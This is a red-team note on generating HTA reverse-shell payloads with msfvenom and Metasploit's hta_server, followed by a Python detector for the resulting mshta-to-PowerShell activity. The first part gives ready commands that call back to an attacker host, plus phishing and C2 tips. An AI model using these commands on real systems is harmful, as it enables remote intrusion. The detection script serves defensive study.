msfvenom can be used to generate HTA reverse shells.

msfvenom -p windows/x64/shell_reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f hta-psh -o ${NAME}.hta

Catch the callback with the standard netcat listener: nc -lvp $ATTACKER_PORT.

Metasploit can do all of this automatically for us via exploit/windows/misc/hta_server. Critical variables to set:

  • LHOST — the host IP address to connect back to
  • LPORT — the port to connect back to
  • SRVHOST — the host IP address to serve the malicious file on
  • payload — the Metasploit payload to use

In quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (e.g., if you’re separating phishing and C2 IPs) they will be different. The payload variable is particularly useful, as you can use something like windows/meterpreter/reverse_tcp and get a meterpreter shell, rather than just a plain reverse shell!

Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.
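Added defender-side example, not part of the original note: the Python below scans Sysmon-style process-creation events for the host-side footprint of the hta-psh payloads above (mshta.exe opening an .hta from a remote or user-writable path, then spawning a hidden, encoded PowerShell or cmd). The event field names, the '|'-joined format and the sample lines are constructed assumptions, not real telemetry.

```python
import ntpath
import re

# Constructed sample events (Sysmon Event ID 1 style, fields joined with '|').
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|"
    r"CommandLine=mshta.exe http://198.51.100.7:8080/invoice.hta",
    r"ParentImage=C:\Windows\System32\mshta.exe|"
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"CommandLine=powershell -nop -w hidden -e QQBCAEMARABFAEYARwBIAA==",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|"
    r"CommandLine=notepad.exe notes.txt",
    r"ParentImage=C:\Windows\System32\mshta.exe|Image=C:\Windows\System32\cmd.exe|"
    r"CommandLine=cmd.exe /c whoami",
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# -e, -ec, -enc or -encodedcommand followed by a base64-looking blob.
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}")
HIDDEN_FLAG = re.compile(r"(?i)-w(indowstyle)?\s+hidden")
# .hta loaded over HTTP(S) or from a user profile directory.
HTA_SOURCE = re.compile(r"(?i)(https?://|\\users\\).*\.hta")


def parse_event(line):
    """Split 'Key=Value|Key=Value' into a dict; values may themselves contain '='."""
    return dict(field.split("=", 1) for field in line.split("|"))


def suspicious_reasons(event):
    """Return the names of every detection rule that fires for one parsed event."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if image == "mshta.exe" and HTA_SOURCE.search(cmd):
        reasons.append("mshta_remote_or_user_hta")
    if parent == "mshta.exe" and image in SHELLS:
        reasons.append("mshta_spawned_shell")
    if image in SHELLS and ENCODED_FLAG.search(cmd) and HIDDEN_FLAG.search(cmd):
        reasons.append("hidden_encoded_powershell")
    return reasons


def scan(lines):
    """Map line index -> fired rules for every event that triggers at least one rule."""
    hits = {}
    for i, line in enumerate(lines):
        reasons = suspicious_reasons(parse_event(line))
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS).items():
        print(idx, why)
```

A single rule firing (an .hta opened from a download folder) is low-confidence on its own; the mshta-to-shell parent/child pair with a hidden encoded command is the combination worth alerting on.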